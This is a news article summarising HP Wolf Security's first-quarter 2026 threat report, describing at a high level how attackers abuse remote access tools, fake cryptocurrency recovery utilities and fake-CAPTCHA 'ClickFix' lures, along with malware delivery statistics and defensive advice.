Join our expert contributor program
Cybercriminals are using legitimate remote access software, fake cryptocurrency recovery tools, and malware disguised as common files to gain control of corporate endpoints, according to the latest HP Wolf Security Threat Insights Report.
Hackers are increasingly relying on trusted software, realistic social engineering tactics, and familiar workflows to bypass traditional security controls and establish persistent access to corporate environments. These findings are based on telemetry collected from HP Wolf Security customers during the first quarter of 2026, analyzing malware campaigns and attack techniques observed across millions of protected endpoints.
HP researchers identified campaigns that leveraged LogMeIn and ScreenConnect, applications commonly used by IT departments for technical support and device administration. Attackers distributed these tools through phishing emails themed around tax year-end activities and through fraudulent desktop application downloads hosted on fake websites, including counterfeit dating platforms.
Once installed, the software provided threat actors with full control over victim devices while appearing indistinguishable from legitimate IT operations. Because these applications are widely used in enterprise environments, malicious activity can blend with routine administrative tasks, reducing the likelihood of detection.
“What stands out in these campaigns is how easily legitimate remote access tools are being turned into entry points for attackers,” says Patrick Schläpfer, Principal Threat Researcher, HP Security Lab. “By combining trusted software with social engineering techniques linked to events such as tax year-end activities, it becomes increasingly difficult to distinguish what is legitimate from what is malicious.”
The findings emerge as organizations continue expanding hybrid work environments and remote administration capabilities. Remote access applications have become essential for IT operations, but their widespread adoption also creates opportunities for attackers seeking to exploit user trust and established workflows.
Other Key Findings
Beyond remote access software, HP researchers documented campaigns targeting cryptocurrency users through fraudulent wallet recovery utilities. The tools claimed to help individuals recover lost cryptocurrency wallets but instead harvested credentials, wallet information, and system data.
According to HP Threat Research, the malware was distributed through code-sharing platforms and media download websites. Researchers observed that many of the scripts contained large numbers of emojis and coding patterns that suggest the use of AI-assisted development techniques, often referred to as “vibe coding.”
Once executed, the malicious tools collected credentials, wallet information, and device data before packaging the information into compressed archive files for exfiltration. The findings indicate that attackers continue adapting development methods to accelerate malware creation while targeting users seeking access to digital assets.
ClickFix Campaigns Exploits
The report also identified a growing use of “ClickFix campaigns,” which disguise malware as audio files. Victims are directed to fake websites featuring realistic CAPTCHA verification prompts. After completing the verification process, users unknowingly execute malicious commands that install malware in the background.
HP Wolf Security researchers observed campaigns that would have delivered Amatera Stealer, malware designed to collect credentials, browser cookies, and cryptocurrency wallet information. Follow-on payloads included adware and NetSupport, a remote administration tool that provides attackers with ongoing access to compromised devices.
The use of CAPTCHA-based delivery mechanisms reflects a broader trend in cybercrime. According to the HP report, attackers increasingly leverage familiar online interactions to lower suspicion and encourage users to complete actions that facilitate infection. By embedding malicious activity within expected workflows, threat actors reduce the effectiveness of traditional warning signs associated with malware attacks.
Additional campaigns identified during the quarter included a PDF-based GuLoader operation that used CAPTCHA prompts to evade detection, Excel macro attacks delivering Loda RAT malware to Spanish-speaking users, and Global Group ransomware distributed through Windows shortcut files disguised as Microsoft Word documents.
Malware Delivery Trends Reveal Persistent Evasion Tactics
The report also provides insight into broader malware distribution trends observed by HP Wolf Security during the first quarter. Executable files represented the most common malware delivery method, accounting for 39% of cases, followed by compressed archive files at 38% and PDF documents at 10%.
Researchers also recorded a 2% increase in malware delivered through PDF files. These campaigns frequently used legal documents, court notifications, and bonus-related communications as lures designed to create urgency and encourage user interaction.
According to HP Wolf Security telemetry, at least 11% of email threats identified by HP Sure Click bypassed one or more email security scanners before being contained within isolated environments.
“These attacks do not look like intrusions; they look like everyday activity. They blend into normal IT operations and avoid the warning signs traditionally associated with malware,” says Alex Holland, Principal Threat Researcher, HP Security Lab. “Organizations should limit unnecessary privileges, control software installation, and isolate high-risk activities such as downloads, unknown links, and email attachments.”
As attackers continue leveraging trusted applications and increasingly convincing social engineering tactics, the findings suggest that enterprise security strategies may need to place greater emphasis on isolation, privilege management, and application control. 
© 2025 Mexicobusiness.News. A Mexico Business Company. All Rights Reserved.
Leave a Reply